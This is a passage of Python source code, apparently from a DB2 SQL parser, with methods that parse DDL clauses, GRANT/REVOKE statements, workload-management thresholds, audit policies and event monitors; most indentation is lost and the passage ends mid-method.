def _parse_assignment_clause(self, allowdefault):
"""Parses a SET clause"""
# SET already matched
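        # For example (illustrative input only; DEFAULT is accepted only
        # where the caller permits it):
        #   SET C1 = C1 + 1, C2 = DEFAULT
        #   SET (C1, C2) = (1, 'a')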
while True:
if self._match('('):
# Parse tuple assignment
while True:
self._parse_subrelation_name()
if not self._match(','):
break
self._expect_sequence([')', '=', '('])
self._parse_tuple(allowdefault=True)
self._expect(')')
else:
# Parse simple assignment
self._parse_subrelation_name()
if self._match('['):
self._parse_expression()
self._expect(']')
if self._match('.'):
self._expect(TT.IDENTIFIER)
self._expect('=')
if self._match('ARRAY'):
self._expect('[', prespace=False)
# Ambiguity: Expression list vs. select-statement
self._save_state()
try:
self._parse_expression_list()
except ParseError:
self._restore_state()
self._parse_full_select()
else:
self._forget_state()
self._expect(']')
elif not (allowdefault and self._match('DEFAULT')):
self._parse_expression()
if not self._match(','):
break
else:
self._newline()
def _parse_identity_options(self, alter=None):
"""Parses options for an IDENTITY column"""
# AS IDENTITY already matched
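        # For example (illustrative):
        #   START WITH 1 INCREMENT BY 1 CACHE 20 NO CYCLE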
# Build a couple of lists of options which have not yet been seen
validno = [
'MINVALUE',
'MAXVALUE',
'CACHE',
'CYCLE',
'ORDER',
]
valid = validno + ['INCREMENT', 'NO']
if alter is None:
valid = valid + ['START']
elif alter == 'SEQUENCE':
valid = valid + ['RESTART']
# XXX Allow backward compatibility options here? Backward
# compatibility options include comma separation of arguments, and
# NOMINVALUE instead of NO MINVALUE, etc.
while valid:
if alter == 'COLUMN':
if self._match('RESTART'):
if self._match('WITH'):
self._expect(TT.NUMBER)
continue
elif self._match('SET'):
t = self._expect_one_of(valid).value
if t != 'NO': valid.remove(t)
if t in validno: validno.remove(t)
else:
break
else:
t = self._match_one_of(valid)
if t:
t = t.value
if t != 'NO': valid.remove(t)
if t in validno: validno.remove(t)
else:
break
if t == 'START':
self._expect_sequence(['WITH', TT.NUMBER])
elif t == 'RESTART':
if self._match('WITH'):
self._expect(TT.NUMBER)
elif t == 'INCREMENT':
self._expect_sequence(['BY', TT.NUMBER])
elif t in ('MINVALUE', 'MAXVALUE', 'CACHE'):
self._expect(TT.NUMBER)
elif t in ('CYCLE', 'ORDER'):
pass
elif t == 'NO':
t = self._expect_one_of(validno).value
validno.remove(t)
valid.remove(t)
def _parse_column_definition(self, aligntypes=False, alignoptions=False, federated=False):
"""Parses a column definition in a CREATE TABLE statement"""
# Parse a column definition
self._expect(TT.IDENTIFIER)
if aligntypes:
self._valign()
self._parse_datatype()
if alignoptions and not self._peek_one_of([',', ')']):
self._valign()
# Parse column options
while True:
if self._match('NOT'):
self._expect_one_of(['NULL', 'LOGGED', 'COMPACT', 'HIDDEN'])
elif self._match('LOGGED'):
pass
elif self._match('COMPACT'):
pass
elif self._match('WITH'):
self._expect('DEFAULT')
self._save_state()
try:
self._parse_expression()
except ParseError:
self._restore_state()
else:
self._forget_state()
elif self._match('DEFAULT'):
self._save_state()
try:
self._parse_expression()
except ParseError:
self._restore_state()
else:
self._forget_state()
elif self._match('GENERATED'):
if self._expect_one_of(['ALWAYS', 'BY']).value == 'BY':
self._expect('DEFAULT')
if self._match('AS'):
if self._match('IDENTITY'):
if self._match('('):
self._parse_identity_options()
self._expect(')')
elif self._match('('):
self._parse_expression()
self._expect(')')
else:
self._expected_one_of(['IDENTITY', '('])
else:
self._expect_sequence(['FOR', 'EACH', 'ROW', 'ON', 'UPDATE', 'AS', 'ROW', 'CHANGE', 'TIMESTAMP'])
elif self._match('INLINE'):
self._expect_sequence(['LENGTH', TT.NUMBER])
elif self._match('COMPRESS'):
self._expect_sequence(['SYSTEM', 'DEFAULT'])
elif self._match('COLUMN'):
self._expect_sequence(['SECURED', 'WITH', TT.IDENTIFIER])
elif self._match('SECURED'):
self._expect_sequence(['WITH', TT.IDENTIFIER])
elif self._match('IMPLICITLY'):
self._expect('HIDDEN')
elif federated and self._match('OPTIONS'):
self._parse_federated_options()
else:
self._save_state()
try:
self._parse_column_constraint()
except ParseError:
self._restore_state()
break
else:
self._forget_state()
def _parse_column_constraint(self):
"""Parses a constraint attached to a specific column in a CREATE TABLE statement"""
# Parse the optional constraint name
if self._match('CONSTRAINT'):
self._expect(TT.IDENTIFIER)
# Parse the constraint definition
if self._match('PRIMARY'):
self._expect('KEY')
elif self._match('UNIQUE'):
pass
elif self._match('REFERENCES'):
self._parse_table_name()
if self._match('(', prespace=False):
self._expect(TT.IDENTIFIER)
self._expect(')')
t = ['DELETE', 'UPDATE']
for i in xrange(2):
if self._match('ON'):
t.remove(self._expect_one_of(t).value)
if self._match('NO'):
self._expect('ACTION')
elif self._match('SET'):
self._expect('NULL')
elif self._match_one_of(['RESTRICT', 'CASCADE']):
pass
else:
self._expected_one_of([
'RESTRICT',
'CASCADE',
'NO',
'SET'
])
else:
break
elif self._match('CHECK'):
self._expect('(')
# Ambiguity: check constraint can be a search condition or a
# functional dependency. Try the search condition first
self._save_state()
try:
self._parse_search_condition()
except ParseError:
self._restore_state()
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
self._expect_sequence(['DETERMINED', 'BY'])
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
else:
self._forget_state()
self._expect(')')
else:
self._expected_one_of([
'CONSTRAINT',
'PRIMARY',
'UNIQUE',
'REFERENCES',
'CHECK'
])
def _parse_table_constraint(self):
"""Parses a constraint attached to a table in a CREATE TABLE statement"""
if self._match('CONSTRAINT'):
self._expect(TT.IDENTIFIER)
if self._match('PRIMARY'):
self._expect('KEY')
self._expect('(')
self._parse_ident_list()
self._expect(')')
elif self._match('UNIQUE'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
elif self._match('FOREIGN'):
self._expect('KEY')
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._expect('REFERENCES')
self._parse_subschema_name()
self._expect('(', prespace=False)
self._parse_ident_list()
self._expect(')')
t = ['DELETE', 'UPDATE']
for i in xrange(2):
if self._match('ON'):
t.remove(self._expect_one_of(t).value)
if self._match('NO'):
self._expect('ACTION')
elif self._match('SET'):
self._expect('NULL')
elif self._match_one_of(['RESTRICT', 'CASCADE']):
pass
else:
self._expected_one_of([
'RESTRICT',
'CASCADE',
'NO',
'SET'
])
else:
break
elif self._match('CHECK'):
self._expect('(')
# Ambiguity: check constraint can be a search condition or a
# functional dependency. Try the search condition first
self._save_state()
try:
self._parse_search_condition(newlines=False)
except ParseError:
self._restore_state()
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
self._expect_sequence(['DETERMINED', 'BY'])
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
else:
self._forget_state()
self._expect(')')
else:
self._expected_one_of([
'CONSTRAINT',
'PRIMARY',
'UNIQUE',
'FOREIGN',
'CHECK'
])
def _parse_table_definition(self, aligntypes=False, alignoptions=False, federated=False):
"""Parses a table definition (list of columns and constraints)"""
self._expect('(')
self._indent()
while True:
self._save_state()
try:
# Try parsing a table constraint definition
self._parse_table_constraint()
except ParseError:
# If that fails, rewind and try and parse a column definition
self._restore_state()
self._parse_column_definition(aligntypes=aligntypes, alignoptions=alignoptions, federated=federated)
else:
self._forget_state()
if not self._match(','):
break
else:
self._newline()
if aligntypes:
self._vapply()
if alignoptions:
self._vapply()
self._outdent()
self._expect(')')
def _parse_constraint_alteration(self):
"""Parses a constraint-alteration in an ALTER TABLE statement"""
# FOREIGN KEY/CHECK already matched
self._expect(TT.IDENTIFIER)
if self._match_one_of(['ENABLE', 'DISABLE']):
self._expect_sequence(['QUERY', 'OPTIMIZATION'])
else:
self._match('NOT')
self._expect('ENFORCED')
def _parse_column_alteration(self):
"""Parses a column-alteration in an ALTER TABLE statement"""
self._expect(TT.IDENTIFIER)
if self._match('DROP'):
if self._match('NOT'):
self._expect('NULL')
elif self._match('COLUMN'):
self._expect('SECURITY')
else:
self._expect_one_of([
'NOT',
'COLUMN',
'IDENTITY',
'DEFAULT',
'EXPRESSION'
])
elif self._match('COMPRESS'):
if self._match('SYSTEM'):
self._expect('DEFAULT')
else:
self._expect('OFF')
elif self._match('SECURED'):
self._expect_sequence(['WITH', TT.IDENTIFIER])
else:
# Ambiguity: SET can introduce several different alterations
self._save_state()
try:
# Try and parse SET (DATA TYPE | EXPRESSION | INLINE LENGTH | GENERATED)
self._expect('SET')
if self._match('DATA'):
self._expect('TYPE')
self._parse_datatype()
elif self._match('EXPRESSION'):
self._expect('AS')
self._expect('(')
self._parse_expression()
self._expect(')')
elif self._match('INLINE'):
self._expect_sequence(['LENGTH', TT.NUMBER])
elif self._match('GENERATED'):
                    if self._expect_one_of(['ALWAYS', 'BY']).value == 'BY':
self._expect('DEFAULT')
self._expect('AS')
if self._match('IDENTITY'):
if self._match('('):
self._parse_identity_options()
self._expect(')')
elif self._match('('):
self._parse_expression()
self._expect(')')
else:
self._expected_one_of(['IDENTITY', '('])
elif self._match('NOT'):
self._expect('NULL')
else:
raise ParseBacktrack()
except ParseBacktrack:
# NOTE: This exception block is only called on a ParseBacktrack
                # error. Other parse errors will propagate outward. If the
# above SET clauses didn't match, try an identity-alteration.
self._restore_state()
self._parse_identity_options(alter='COLUMN')
else:
self._forget_state()
def _parse_federated_column_alteration(self):
"""Parses a column-alteration in an ALTER NICKNAME statement"""
self._expect(TT.IDENTIFIER)
while True:
if self._match('LOCAL'):
if self._match('NAME'):
self._expect(TT.IDENTIFIER)
elif self._match('TYPE'):
self._parse_datatype()
elif self._match('OPTIONS'):
self._parse_federated_options(alter=True)
if not self._match(','):
break
def _parse_auth_list(self):
"""Parses an authorization list in a GRANT or REVOKE statement"""
# [TO|FROM] already matched
while True:
if not self._match('PUBLIC'):
self._match_one_of(['USER', 'GROUP', 'ROLE'])
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
def _parse_grant_revoke(self, grant):
"""Parses the body of a GRANT or REVOKE statement"""
# [GRANT|REVOKE] already matched
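        # For example (illustrative input only):
        #   GRANT SELECT, UPDATE (C1) ON TABLE S.T TO USER FRED WITH GRANT OPTION
        #   REVOKE EXECUTE ON FUNCTION S.F (INTEGER) FROM PUBLIC RESTRICT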
# Parse any preamble
seclabel = False
if self._match('ROLE'):
pass
elif self._match_sequence(['SECURITY', 'LABEL']):
seclabel = grant
# Parse the privilege list
while True:
priv = self._expect(TT.IDENTIFIER)
if priv.value in ('REFERENCES', 'UPDATE'):
if self._match('('):
self._parse_ident_list()
self._expect(')')
elif priv.value == 'DBADM':
while self._match_one_of(['WITH', 'WITHOUT']):
self._expect_one_of(['DATAACCESS', 'ACCESSCTRL'])
elif priv.value == 'DB2LBACWRITEARRAY':
self._expect_one_of(['WRITEDOWN', 'WRITEUP'])
elif priv.value == 'ALL':
self._match('PRIVILEGES')
break
if not self._match(','):
break
# Parse the target list
if self._match('OF'):
self._expect_sequence(['TABLESPACE', TT.IDENTIFIER])
elif self._match('ON'):
while True:
if self._match('DATABASE'):
break
elif self._match('RULE'):
if self._expect_one_of([
'DB2LBACREADARRAY',
'DB2LBACREADSET',
'DB2LBACREADTREE',
'DB2LBACWRITEARRAY',
'DB2LBACWRITESET',
'DB2LBACWRITETREE',
'ALL'
]).value == 'DB2LBACWRITEARRAY':
self._expect_one_of(['WRITEDOWN', 'WRITEUP'])
self._expect_sequence(['FOR', TT.IDENTIFIER])
break
elif self._match('VARIABLE'):
self._parse_variable_name()
break
elif self._match('INDEX'):
self._parse_index_name()
break
elif self._match('MODULE'):
self._parse_module_name()
break
elif self._match_one_of(['PROGRAM', 'PACKAGE']):
self._parse_subschema_name()
break
elif self._match_one_of(['FUNCTION', 'PROCEDURE']):
# Ambiguity: Can use schema.* or schema.name(prototype) here
if not self._match('*') and not self._match_sequence([TT.IDENTIFIER, '.', '*']):
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
break
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
break
elif self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
break
elif self._match('SEQUENCE'):
self._parse_sequence_name()
break
elif self._match('SERVER'):
self._expect(TT.IDENTIFIER)
break
elif self._match('USER'):
self._expect(TT.IDENTIFIER)
elif self._match('PUBLIC'):
pass
elif self._match('TABLE'):
self._parse_table_name()
break
elif self._match('WORKLOAD'):
self._expect(TT.IDENTIFIER)
break
elif self._match('XSROBJECT'):
self._parse_subschema_name()
break
else:
self._parse_table_name()
break
if not self._match(','):
break
# Parse the grantee(s)
# XXX The following is a bit lax, but again, adhering strictly to the
# syntax results in a ridiculously complex syntax
self._expect(['FROM', 'TO'][grant])
self._parse_auth_list()
if seclabel:
if self._match('FOR'):
self._expect_one_of(['ALL', 'READ', 'WRITE'])
self._expect('ACCESS')
elif grant:
if self._match('WITH'):
self._expect_one_of(['GRANT', 'ADMIN'])
self._expect('OPTION')
else:
self._match_sequence(['BY', 'ALL'])
self._match('RESTRICT')
def _parse_tablespace_size_attributes(self):
"""Parses DMS size attributes in a CREATE TABLESPACE statement"""
if self._match('AUTORESIZE'):
self._expect_one_of(['NO', 'YES'])
        if self._match('INITIALSIZE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G'])
if self._match('INCREASESIZE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G', 'PERCENT'])
if self._match('MAXSIZE'):
if not self._match('NONE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G'])
def _parse_database_container_clause(self, size=True):
"""Parses a container clause for a DMS tablespace"""
self._expect('(')
while True:
self._expect_one_of(['FILE', 'DEVICE'])
self._expect(TT.STRING)
if size:
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
if not self._match(','):
break
self._expect(')')
def _parse_system_container_clause(self):
"""Parses a container clause for an SMS tablespace"""
self._expect('(')
while True:
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(')')
def _parse_db_partition_clause(self):
"""Parses a DBPARTITIONNUM clause in various statements"""
if not self._match('GLOBAL'):
if self._match('AT'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
def _parse_db_partition_list_clause(self, size=False):
"""Parses an DBPARTITIONNUM clause in various statements"""
self._expect_one_of([
'DBPARTITIONNUM',
'DBPARTITIONNUMS',
'NODE', # compatibility option
'NODES', # compatibility option
])
self._expect('(')
while True:
self._expect(TT.NUMBER)
self._match_sequence(['TO', TT.NUMBER])
if size:
self._expect_sequence(['SIZE', TT.NUMBER])
if not self._match(','):
break
self._expect(')')
def _parse_db_partitions_clause(self):
"""Parses a DBPARTITIONNUM list clause in various statements"""
if self._match('ON'):
if self._match('ALL'):
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
if self._match('EXCEPT'):
self._parse_db_partition_list_clause(size=False)
else:
self._parse_db_partition_list_clause(size=False)
def _parse_function_predicates_clause(self):
"""Parses the PREDICATES clause in a CREATE FUNCTION statement"""
# PREDICATES already matched
# The surrounding parentheses seem to be optional (although the syntax
# diagram in the DB2 Info Center implies otherwise)
parens = self._match('(')
self._expect('WHEN')
self._match_one_of(['=', '<>', '<', '>', '<=', '>='])
if self._match('EXPRESSION'):
self._expect_sequence(['AS', TT.IDENTIFIER])
else:
self._parse_expression()
valid = ['SEARCH', 'FILTER']
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'SEARCH':
self._expect('BY')
self._match('EXACT')
self._expect('INDEX')
self._expect('EXTENSION')
self._parse_index_name()
self._expect('WHEN')
while True:
self._expect_sequence(['KEY', '(', TT.IDENTIFIER, ')', 'USE', TT.IDENTIFIER, '('])
self._parse_ident_list()
self._expect(')')
if not self._match('WHEN'):
break
elif t == 'FILTER':
self._expect('USING')
if self._match('CASE'):
if self._match('WHEN'):
self._parse_searched_case()
else:
self._parse_simple_case()
else:
self._parse_scalar_function_call()
if parens:
self._expect(')')
def _parse_federated_options(self, alter=False):
"""Parses an OPTIONS list for a federated object"""
# OPTIONS already matched
self._expect('(')
while True:
if alter and self._match('DROP'):
self._expect(TT.IDENTIFIER)
else:
if alter:
                    self._match_one_of(['ADD', 'SET'])
else:
self._match('ADD')
self._expect(TT.IDENTIFIER)
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(')')
def _parse_remote_server(self):
"""Parses a remote server specification"""
# SERVER already matched
if self._match('TYPE'):
self._expect(TT.IDENTIFIER)
if self._match('VERSION'):
self._parse_server_version()
if self._match('WRAPPER'):
self._expect(TT.IDENTIFIER)
else:
self._expect(TT.IDENTIFIER)
if self._match('VERSION'):
self._parse_server_version()
def _parse_server_version(self):
"""Parses a federated server version"""
# VERSION already matched
if self._match(TT.NUMBER):
if self._match('.'):
self._expect(TT.NUMBER)
if self._match('.'):
self._expect(TT.NUMBER)
elif self._match(TT.STRING):
pass
else:
self._expected_one_of([TT.NUMBER, TT.STRING])
def _parse_partition_boundary(self):
"""Parses a partition boundary in a PARTITION clause"""
if self._match('STARTING'):
self._match('FROM')
if self._match('('):
while True:
self._expect_one_of([TT.NUMBER, 'MINVALUE', 'MAXVALUE'])
if not self._match(','):
break
self._expect(')')
else:
self._expect_one_of([TT.NUMBER, 'MINVALUE', 'MAXVALUE'])
self._match_one_of(['INCLUSIVE', 'EXCLUSIVE'])
self._expect('ENDING')
self._match('AT')
if self._match('('):
while True:
self._expect_one_of([TT.NUMBER, 'MINVALUE', 'MAXVALUE'])
if not self._match(','):
break
self._expect(')')
else:
self._expect_one_of([TT.NUMBER, 'MINVALUE', 'MAXVALUE'])
self._match_one_of(['INCLUSIVE', 'EXCLUSIVE'])
def _parse_copy_options(self):
"""Parse copy options for CREATE TABLE... LIKE statements"""
# XXX Tidy this up (shouldn't just be a 2-time loop)
for i in xrange(2):
if self._match_one_of(['INCLUDING', 'EXCLUDING']):
if self._match('COLUMN'):
self._expect('DEFAULTS')
elif self._match('DEFAULTS'):
pass
elif self._match('IDENTITY'):
self._match_sequence(['COLUMN', 'ATTRIBUTES'])
def _parse_refreshable_table_options(self, alter=False):
"""Parses refreshable table options in a materialized query definition"""
if not alter and self._match('WITH'):
self._expect_sequence(['NO', 'DATA'])
self._parse_copy_options()
else:
valid = [
'DATA',
'REFRESH',
'ENABLE',
'DISABLE',
'MAINTAINED',
]
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'DATA':
self._expect_sequence(['INITIALLY', 'DEFERRED'])
elif t == 'REFRESH':
self._expect_one_of(['DEFERRED', 'IMMEDIATE'])
elif t in ('ENABLE', 'DISABLE'):
self._expect_sequence(['QUERY', 'OPTIMIZATION'])
if t == 'ENABLE':
valid.remove('DISABLE')
else:
valid.remove('ENABLE')
elif t == 'MAINTAINED':
self._expect('BY')
self._expect_one_of(['SYSTEM', 'USER', 'FEDERATED_TOOL'])
def _parse_action_types_clause(self):
"""Parses an action types clause in a WORK ACTION"""
if self._match('MAP'):
self._expect('ACTIVITY')
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('NESTED')
self._expect('TO')
self._expect(TT.IDENTIFIER)
elif self._match('WHEN'):
self._parse_threshold_predicate()
self._parse_threshold_exceeded_actions()
elif self._match('PREVENT'):
self._expect('EXECUTION')
elif self._match('COUNT'):
self._expect('ACTIVITY')
elif self._match('COLLECT'):
if self._match('ACTIVITY'):
self._expect('DATA')
self._parse_collect_activity_data_clause()
elif self._match('AGGREGATE'):
self._expect_sequence(['ACTIVITY', 'DATA'])
self._match_one_of(['BASE', 'EXTENDED'])
else:
self._expected_one_of(['MAP', 'WHEN', 'PREVENT', 'COUNT', 'COLLECT'])
def _parse_threshold_predicate(self):
"""Parses a threshold predicate in a WORK ACTION"""
if self._match_one_of([
'TOTALDBPARTITIONCONNECTIONS',
'CONCURRENTWORKLOADOCCURRENCES',
'CONCURRENTWORKLOADACTIVITIES',
'ESTIMATEDSQLCOST',
'SQLROWSRETURNED',
]):
self._expect_sequence(['>', TT.NUMBER])
elif self._match('TOTALSCPARTITIONCONNECTIONS'):
self._expect_sequence(['>', TT.NUMBER])
if self._match('QUEUEDCONNECTIONS'):
if self._match('>'):
self._expect(TT.NUMBER)
elif self._match('UNBOUNDED'):
pass
else:
self._expected_one_of(['>', 'UNBOUNDED'])
elif self._match('CONCURRENTDBCOORDACTIVITIES'):
self._expect_sequence(['>', TT.NUMBER])
if self._match('QUEUEDACTIVITIES'):
if self._match('>'):
self._expect(TT.NUMBER)
elif self._match('UNBOUNDED'):
pass
else:
self._expected_one_of(['>', 'UNBOUNDED'])
elif self._match_one_of([
'CONNECTIONIDLETIME',
'ACTIVITYTOTALTIME',
]):
self._expect_sequence(['>', TT.NUMBER])
self._expect_one_of([
'DAY',
'DAYS',
'HOUR',
'HOURS',
'MINUTE',
'MINUTES'
])
elif self._match('SQLTEMPSPACE'):
self._expect_sequence(['>', TT.NUMBER])
self._expect_one_of(['K', 'M', 'G'])
def _parse_threshold_exceeded_actions(self):
"""Parses a threshold exceeded actions clause in a WORK ACTION"""
if self._match_sequence(['COLLECT', 'ACTIVITY', 'DATA']):
self._parse_collect_activity_data_clause(alter=True)
if self._match('STOP'):
self._expect('EXECUTION')
elif not self._match('CONTINUE'):
self._expected_one_of(['STOP', 'CONTINUE'])
def _parse_collect_activity_data_clause(self, alter=False):
"""Parses a COLLECT ACTIVITY clause in an action clause"""
# COLLECT ACTIVITY DATA already matched
if not (alter and self._match('NONE')):
self._expect('ON')
if self._match('ALL'):
self._match_sequence(['DATABASE', 'PARTITIONS'])
elif self._match('COORDINATOR'):
self._match_sequence(['DATABASE', 'PARTITION'])
else:
self._expected_one_of(['ALL', 'COORDINATOR'])
if self._match('WITHOUT'):
self._expect('DETAILS')
elif self._match('WITH'):
self._expect('DETAILS')
if self._match('AND'):
self._expect('VALUES')
else:
self._expected_one_of(['WITHOUT', 'WITH'])
def _parse_histogram_template_clause(self):
"""Parses a history template clause in a WORK ACTION"""
if self._match('ACTIVITY'):
            self._expect_one_of(['LIFETIME', 'QUEUETIME', 'EXECUTETIME', 'ESTIMATEDCOST', 'INTERARRIVALTIME'])
self._expect_sequence(['HISTOGRAM', 'TEMPLATE'])
self._expect_one_of(['SYSDEFAULTHISTOGRAM', TT.IDENTIFIER])
def _parse_work_attributes(self):
"""Parses a work attributes clause in a WORK CLASS"""
self._expect_sequence(['WORK', 'TYPE'])
if self._match_one_of(['READ', 'WRITE', 'DML']):
self._parse_for_from_to_clause()
elif self._match('ALL'):
if self._match('FOR'):
self._parse_for_from_to_clause()
if self._match('ROUTINES'):
self._parse_routines_in_schema_clause()
elif self._match('CALL'):
if self._match('ROUTINES'):
self._parse_routines_in_schema_clause()
elif not self._match_one_of(['DDL', 'LOAD']):
self._expected_one_of(['READ', 'WRITE', 'DML', 'DDL', 'LOAD', 'ALL', 'CALL'])
def _parse_for_from_to_clause(self, alter=False):
"""Parses a FOR .. FROM .. TO clause in a WORK CLASS definition"""
# FOR already matched
if alter and self._match('ALL'):
self._expect_sequence(['UNITS', 'UNBOUNDED'])
else:
self._expect_one_of(['TIMERONCOST', 'CARDINALITY'])
self._expect_sequence(['FROM', TT.NUMBER])
if self._match('TO'):
self._expect_one_of(['UNBOUNDED', TT.NUMBER])
def _parse_routines_in_schema_clause(self, alter=False):
"""Parses a schema clause in a WORK CLASS definition"""
# ROUTINES already matched
if alter and self._match('ALL'):
pass
else:
self._expect_sequence(['IN', 'SCHEMA', TT.IDENTIFIER])
def _parse_position_clause(self):
"""Parses a POSITION clause in a WORK CLASS definition"""
# POSITION already matched
if self._match('AT'):
self._expect(TT.NUMBER)
elif self._match_one_of(['BEFORE', 'AFTER']):
self._expect(TT.IDENTIFIER)
elif self._match('LAST'):
pass
else:
self._expected_one_of(['AT', 'BEFORE', 'AFTER', 'LAST'])
def _parse_connection_attributes(self):
"""Parses connection attributes in a WORKLOAD"""
if self._match_one_of([(TT.REGISTER, 'APPLNAME'), (TT.REGISTER, 'SYSTEM_USER')]):
pass
elif self._match((TT.REGISTER, 'SESSION_USER')):
self._match('GROUP')
elif self._match('CURRENT'):
self._expect_one_of([
(TT.REGISTER, 'CLIENT_USERID'),
(TT.REGISTER, 'CLIENT_APPLNAME'),
(TT.REGISTER, 'CLIENT_WRKSTNNAME'),
(TT.REGISTER, 'CLIENT_ACCTNG')
])
else:
self._expected_one_of(['APPLNAME', 'SYSTEM_USER', 'SESSION_USER', 'CURRENT'])
        self._expect('(')
        while True:
            self._expect(TT.STRING)
            if not self._match(','):
                break
        self._expect(')')
def _parse_audit_policy(self, alter=False):
"""Parses an AUDIT POLICY definition"""
valid = set(['CATEGORIES', 'ERROR'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'CATEGORIES':
while True:
if self._expect_one_of([
'ALL',
'AUDIT',
'CHECKING',
'CONTEXT',
'EXECUTE',
'OBJMAINT',
'SECMAINT',
'SYSADMIN',
'VALIDATE'
]).value == 'EXECUTE':
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('DATA')
self._expect('STATUS')
self._expect_one_of(['BOTH', 'FAILURE', 'NONE', 'SUCCESS'])
if not self._match(','):
break
elif t == 'ERROR':
self._expect('TYPE')
self._expect_one_of(['NORMAL', 'AUDIT'])
# If we're defining a new policy, ensure both terms are specified
if not alter and valid:
self._expected(valid.pop())
def _parse_evm_group(self):
"""Parses an event monitor group in a non-wlm event monitor definition"""
while True:
self._expect(TT.IDENTIFIER)
if self._match('('):
valid = set(['TABLE', 'IN', 'PCTDEACTIVATE', 'TRUNC', 'INCLUDES', 'EXCLUDES'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'TABLE':
self._parse_table_name()
elif t == 'IN':
self._expect(TT.IDENTIFIER)
elif t == 'PCTDEACTIVATE':
self._expect(TT.NUMBER)
elif t == 'TRUNC':
pass
elif t == 'INCLUDES' or t == 'EXCLUDES':
self._expect('(')
while True:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
self._expect(')')
self._expect(')')
if not self._match(','):
break
def _parse_evm_write_to(self):
"""Parses a WRITE TO clause in an event monitor definition"""
# WRITE TO already matched
if self._match('TABLE'):
valid = set(['BUFFERSIZE', 'BLOCKED', 'NONBLOCKED', 'evm-group'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
elif 'evm-group' in valid:
self._save_state()
try:
self._parse_evm_group()
valid.remove('evm-group')
except ParseError:
self._restore_state()
break
else:
self._forget_state()
else:
break
if t == 'BUFFERSIZE':
self._expect(TT.NUMBER)
elif t == 'BLOCKED':
valid.remove('NONBLOCKED')
elif t == 'NONBLOCKED':
valid.remove('BLOCKED')
elif self._match('PIPE'):
self._expect(TT.STRING)
elif self._match('FILE'):
self._expect(TT.STRING)
valid = set(['MAXFILES', 'MAXFILESIZE', 'BUFFERSIZE', 'BLOCKED', 'NONBLOCKED', 'APPEND', 'REPLACE'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'MAXFILES' or t == 'MAXFILESIZE':
self._expect_one_of(['NONE', TT.NUMBER])
elif t == 'BLOCKED':
valid.remove('NONBLOCKED')
elif t == 'NONBLOCKED':
valid.remove('BLOCKED')
elif t== 'APPEND':
valid.remove('REPLACE')
elif t == 'REPLACE':
valid.remove('APPEND')
else:
self._expected_one_of(['TABLE', 'PIPE', 'FILE'])
def _parse_evm_options(self):
"""Parses the options after an event monitor definition"""
valid = set(['WRITE', 'AUTOSTART', 'MANUALSTART', 'ON', 'LOCAL', 'GLOBAL'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'WRITE':
self._expect('TO')
self._parse_evm_write_to()
elif t == 'AUTOSTART':
valid.remove('MANUALSTART')
elif t == 'MANUALSTART':
valid.remove('AUTOSTART')
elif t == 'ON':
self._expect_one_of(['NODE', 'DBPARTITIONNUM'])
self._expect(TT.NUMBER)
elif t == 'LOCAL':
valid.remove('GLOBAL')
elif t == 'GLOBAL':
valid.remove('LOCAL')
def _parse_nonwlm_event_monitor(self):
"""Parses a non-wlm event monitor definition"""
while True:
if self._match_one_of(['DATABASE', 'TABLES', 'BUFFERPOOLS', 'TABLESPACES']):
pass
elif self._match('DEADLOCKS'):
if self._match_sequence(['WITH', 'DETAILS']):
if self._match('HISTORY'):
self._match('VALUES')
elif self._match_one_of(['CONNECTIONS', 'STATEMENTS', 'TRANSACTIONS']):
if self._match('WHERE'):
self._parse_search_condition()
else:
self._expected_one_of([
'DATABASE',
'TABLES',
'BUFFERPOOLS',
'TABLESPACES',
'DEADLOCKS',
'CONNECTIONS',
'STATEMENTS',
'TRANSACTIONS',
])
if not self._match(','):
break
self._parse_evm_options()
def _parse_wlm_event_monitor(self):
"""Parses a wlm event monitor definition"""
if self._expect_one_of(['ACTIVITIES', 'STATISTICS', 'THRESHOLD']).value == 'THRESHOLD':
self._expect('VIOLATIONS')
self._parse_evm_options()
# STATEMENTS #############################################################
def _parse_allocate_cursor_statement(self):
"""Parses an ALLOCATE CURSOR statement in a procedure"""
# ALLOCATE already matched
self._expect_sequence([TT.IDENTIFIER, 'CURSOR', 'FOR', 'RESULT', 'SET', TT.IDENTIFIER])
def _parse_alter_audit_policy_statement(self):
"""Parses an ALTER AUDIT POLICY statement"""
# ALTER AUDIT POLICY already matched
        self._expect(TT.IDENTIFIER)
self._parse_audit_policy(alter=True)
def _parse_alter_bufferpool_statement(self):
"""Parses an ALTER BUFFERPOOL statement"""
# ALTER BUFFERPOOL already matched
self._expect(TT.IDENTIFIER)
if self._match('ADD'):
